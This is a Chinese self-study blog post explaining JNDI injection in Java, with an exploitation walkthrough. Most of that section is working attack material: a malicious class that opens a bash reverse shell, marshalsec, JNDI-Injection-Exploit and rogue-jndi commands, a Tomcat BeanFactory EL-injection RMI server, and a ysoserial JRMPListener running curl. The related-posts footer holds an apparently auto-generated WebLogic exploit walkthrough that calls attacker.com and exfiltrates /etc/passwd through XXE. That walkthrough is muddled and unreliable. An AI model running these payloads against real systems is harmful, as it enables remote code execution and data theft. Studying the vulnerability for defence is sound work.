JNDI注入详解(自学)

已于 2024-03-05 16:49:20 修改
阅读量1k 收藏 23
点赞数 22
分类专栏: Web Java安全 文章标签: java web安全 笔记
于 2024-03-03 21:47:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64481831/article/details/136417513
版权

目录

目录

JNDI简介

命名服务和目录服务

JNDI注入

漏洞原理

漏洞利用

简单复现

利用Reference加载远程Factory类

使用手动方法

使用集成JDNI注入工具

利用Reference加载本地Factory类

反序列化利用

总结

JNDI简介

Jndi叫Java命名和目录的接口,可以类比为一个字典(就比如用一个目录路径去定义一个文件,目录路径和文件就是键值)。

在Java应用中除了以常规方式使用名称服务(比如使用DNS解析域名) ,另一个常见的用法是使用目录服务作为对象存储的系统来存储和获取Java对象(比如使用打印机,在目录服务查找打印机然后获得一个打印机对象)。

Jndi包含在Java SE平台。要使用Jndi,您必须拥有Jndi类和一个或多个服务提供者(SPI)。JDK包含以下命名/目录服务的服务提供者:

目录服务:

  • 轻量级目录访问协议(LDAP
  • Java远程方法调用(RMI

命名服务:

  • 公共对象请求代理体系结构(CORBA)
  • 域名服务(DNS)

命名服务和目录服务

命名服务很好理解,就跟字典一样,将一个对象作为值,将命名服务的名字作为键,将两者绑定就可以通过这个名字查询到绑定的对象。

目录服务是名称服务的一种拓展,除了命名服务通过名称绑定对象之外,还允许根据对象的属性值去搜索对象。

举个例子:还是打印机,我们可以在命名服务中根据打印机的名称去获取打印机对象,然后进行打印;同样的由于打印机拥有速率、颜色等属性,可以通过目录服务以打印机的速率去搜索打印机对象,再进行打印操作。

而这里可以再讲讲目录服务协议:

LDAP:轻量级目录访问协议,是一种开放的网络协议,用于访问和维护分布式目录服务(比如树状型层次目录)。LDAP提供了一种标准化的方式来查询、添加、修改和删除分布式目录中的数据。

RMI:远程方法调用,用于实现分布式应用程序中的远程通信和方法调用。RMI允许在不同Java虚拟机(JVM)上运行的对象之间进行通信,并调用对方的方法,就像调用本地对象的方法一样。

由于Jndi提供的接口统一性,当需要访问不同类型的目录服务时,不必再分别针对不同的服务协议来实现用于访问的客户端,而是通过Jndi提供的统一接口访问。

JNDI注入

漏洞原理

如果被攻击端应用程序中进行了JNDI查询(使用了lookup查询等),并且其查询的地址或者名称是可控的,那么就会形成JNDI注入漏洞。

根据原理,也可以知道要利用JNDI需要两个条件:

  • 使用了lookup等JNDI查询函数
  • 参数可控

漏洞利用

利用流程:

1、 攻击者再构造一个payload,并在此目录开启HTTP服务(使用apache开启等)

2、 攻击者搭建一个RMI/LDAP服务端,并将返回值设置为payload对象

3、构造RMI/LDAP协议的URL字符串(就是对应RMI/LDAP服务端地址)作为参数传入目标应用的JNDI的lookup方法中

在被攻击者角度来说,它访问了攻击者特意构造的RMI/LDAP协议的URL,然后访问其服务端,服务端又返回一个HTTP地址给被攻击者(这个HTTP地址就是带有payload的地址),然后被攻击者去访问下载HTTP地址的文件然后做初始化加载,到这里攻击者的恶意代码就被执行了。

简单复现

有一个App.java使用了RMI协议且参数可控

import javax.naming.InitialContext;
import javax.naming.NamingException;

public class App  {
    public static void main(String[] args) throws NamingException {
        String var = "rmi://127.0.0.1:7788/calc";
        new InitialContext().lookup(var);
    }

}

然后建立了RMI服务端,RMIServer.java

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class RMIServer {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(7788);
        Reference reference = new Reference("test","test","http://192.168.15.249:8000/");
        ReferenceWrapper wrapper = new ReferenceWrapper(reference);
        registry.bind("calc",wrapper);


    }
}

然后构造payload,test.java

import java.io.IOException;

public class test {
    public test() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}

直接运行也是可以弹出计算机的,这是因为RMI会先在本地找,然后再加载远程的,由于测试环境是直接都在本地所以不开启HTTP服务也可以执行,但在攻击时肯定不可能被攻击者原本就存有payload代码,所以一般都是要先编译payload的脚本然后在预编译后文件的文件夹下开启HTTP服务。

还有要提到的是,由于能够利用LDAP的JDK的版本比能够利用RMI的JDK的版本要多,所以比较常用的是以LDAP来进行攻击,以便提高攻击成功率。

利用Reference加载远程Factory类

上面举的简单例子也是通过Reference来加载的。

比如被攻击者代码:

String jndiurl = GET["url"];
Context ctx = new InitialContext();
ctx.lookup(jndiurl);

使用手动方法

Marshalsec这款工具集成了有恶意RMI或LDAP服务的程序,这款工具的使用需要Java8的环境。

项目地址:Marshalsec项目地址

Marshalsec需要Maven和Java环境,大家自行下载。

下载后,进入文件夹输入如下命令:

mvn clean package -DskipTests

然后开启一个LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:http端口//#Shell 监听端口

这个命令会在xx端口监听一个LDAP服务,当被攻击者lookup这个服务端时,它会返回一个Reference。类加载地址指向http://ip:http端口/Shell.class,Exploit.class是攻击者构造的恶意代码编译后的文件。比如:

//Shell.java
public class Shell{
    static {				//static是编译运行时最初会执行的
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/攻击机ip/nc端口 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}

之后在攻击机上开启监听:

nc -lvnp nc端口

最后构造payload就可以诱导目标服务器访问LDAP服务器:

?url=ldap://ip:http端口/Shell

使用集成JDNI注入工具

用到的工具为JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

项目地址:JNDI注入工具项目地址

下载之后还需要使用Maven进行生成可执行文件

利用方法:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "恶意命令" -A "攻击机ip"

比如:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -i >& /dev/tcp/192.168.1.100/6666 0>&1" -A "192.168.1.100"

把恶意命令base64编码:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzY2NjYgMD4mMQ==" -A "192.168.1.100"

执行命令后会返回部署好的RMI和LDAP的路径

开启6666端口监听,然后访问路径就可以了。

利用Reference加载本地Factory类

从高版本JDK开始,就禁止RMI和LDAP远程加载Factory类。那么就只能把目标转到本地,如果在被攻击者的依赖环境中可以找到危险的Factory,同样可以加载Factory类,完成代码执行。

比如,Tomcat Server中的org.apache.naming.factory.BeanFactory,因为该类的getObjectInstance方法能够反射,可以通过它来调用java.el.ELProcessor的eval方法,最终实现EL表达式来达到远程代码执行的效果。

比如构造启动RMI服务的代码:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //准备利用org.apache.naming.factory.BeanFactory中不安全反射的有效负载
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //将“x”属性的setter名称从“setX”重新定义为“eval”
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //表达式语言执行“nslookup jndi.s.artsplooit.com”,如果您的目标是windows,请将/bin/sh修改为cmd.exe
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

构造payload:

?url=rmi://evil_rmi_server:1097/Object

这里执行了RMI服务,目标程序如果有Tomcat相关依赖,就能够连接上恶意的RMI服务,最终通过构造表达式执行系统命令nslookup jndi.s.artsploit.com。

除了这个类,还有其他许多的危险的Factory类,都已经集成到rogue-jndi中,项目地址:rogue-jnd项目地址

java -jar target/RogueJndi-1.0.jar --command "命令" --hostname 本机地址

反序列化利用

前面两种都是通过将恶意的对象绑定到RMI或LDAP中,是通过序列化对象来实现攻击的。还可以通过JNDI注入来实现反序列化攻击。

Java反序列化攻击的话是利用ysoserial工具的,这里借助ysoserial的JRMPListener来完成。

使用方法:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonCollections6 "curl http://you-ip/"

会在攻击机1099端口开启JRMP服务(RMI的底层协议),当受害者访问时,JRMP就会构建恶意的Commons Collection序列化数据返回给受害者客户端,如果受害者客户端存在有漏洞的Apache Commons Collection库,反序列化攻击就会成功,命令被执行。

?url=ldap://your-ip:1099/Exploit

总结

  • JNDI是Java命名和目录的接口,类似于字典,可以通过名称或对象的特征来寻找到对应的对象并获取。安全要比较了解的有:目录服务包括RMI(远程访问协议)和LDAP(轻量级目录访问协议)以及命名服务的DNS协议(JNDI注入中可以通过dnslog来判断是否存在漏洞而且简单、隐藏性高)
  • JNDI注入漏洞需要两个条件:一个是被攻击端使用了lookup等函数进行JNDI查询;另一个是需要查询的参数可控。JNDI注入的利用攻击者需要准备两个步骤:一个是开启RMI/LDAP服务端;另一个是有恶意代码的payload
  • 被攻击端通过精心构造的URL访问到攻击者的RMI/LDAP服务端,然后服务端返回一个HTTP地址,被攻击端继续访问HTTP地址然后将其内容下载运行,最终执行了恶意代码
  • 利用方式有利用Reference加载远程Factory类和本地Factory类。加载远程Factory类可以通过手动注入和工具注入;加载本地Factory类是因为随着JDK版本的升高,被禁止加载远程Factory类而只能通过本地的一些类的可利用方法来实现,通过工具rogue-jnd来实现
  • 除了上面的两种序列化利用方式,还可以通过JNDI注入来实现反序列化利用,借助Java反序列化工具ysoserial。
!!!!!!!!!!!!!!!!.
关注
  • 22
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
JNDI注入详解
m0_60571990的博客
03-02 3457
JNDI注入详解
[Java安全]—JNDI注入
Sentiment的博客
07-08 2597
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
JNDI注入学习(看不懂直接喷,别忍着!)
一剑开天门!的博客
01-13 2475
JNDI注入学习(看不懂直接喷,别忍着!)
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5348
JDNI注入总结
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
JNDI注入学习1
08-03
JNDI 注简单来说就是在 JNDI 接在初始化时,如: InitialContext.lookup(URI) ,如果URI 可控,那么客户端就可能会被攻击通过
JNDI配置原理详解.doc
10-27
JNDI配置原理详解 JNDI配置原理详解.doc
Spring jndi数据源配置方法详解
08-30
主要为大家详细介绍了Spring jndi数据源的配置方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下解
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI注入
Christ1na的博客
11-17 742
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9325
0x01 JNDI 概述 JNDIJava Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
Java代码审计】JNDI注入
最新发布
大河之犬的博客
03-07 1086
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDIJava EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
JNDI注入+高版本绕过+工具使用
GalaxySpaceX的博客
06-21 2057
JNDI注入+高版本绕过+工具使用
[JAVA安全]全面学习JNDI机制与注入
qq_42585535的博客
10-06 488
看过很多讲解JNDI的文章,但大多是一上来就长篇大论的抽象解释让我很是头疼,命名接口目录映射统一的API… 感觉又回到了当初做英语阅读抠字眼的中学时期,所以今天,我决定先上几个实际的应用,在研究代码的同时体会一下JNDI的设计思想RMI是远程方法调用的缩写,它是一种在Java中创建分布式应用的机制,可以让一个系统(JVM)中的对象访问或调用另一个系统(JVM)中的对象的方法。RMI利用了两个对象:stub和skeleton,来实现远程通信。
JNDI注入解析
gental_z的博客
01-04 7611
一、什么是JNDIJNDI全称为Java命名和目录接口。我们可以理解为JNDI提供了两个服务,即命名服务和目录服务。 ​ 命名服务将一个对象和一个名称进行绑定,然后放置到一个容器里面。当我们想要获取这个对象的时候,就可以通过容器来查找这个名称,从而获得这个对象。 ​ 目录服务就是将一些对象的属性放置到容器中,然后想要操作这个属性的时候,就通过容器来进行查找。 ​ 对比一下命名服务和目录服务,其实命名服务就是绑定对象,而目录服务就是绑定了对象的属性。在JNDI中,命名服务和目录服务是一起结合提供的,最容
weblogic jndi注入漏洞利用
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求,触发 JNDI 注入漏洞。例如,可以使用以下命令触发漏洞: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 XML 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 XML 文件: ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 DTD 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 DTD 文件: ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器向攻击者控制的服务器发送 HTTP 请求,从而触发恶意代码的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值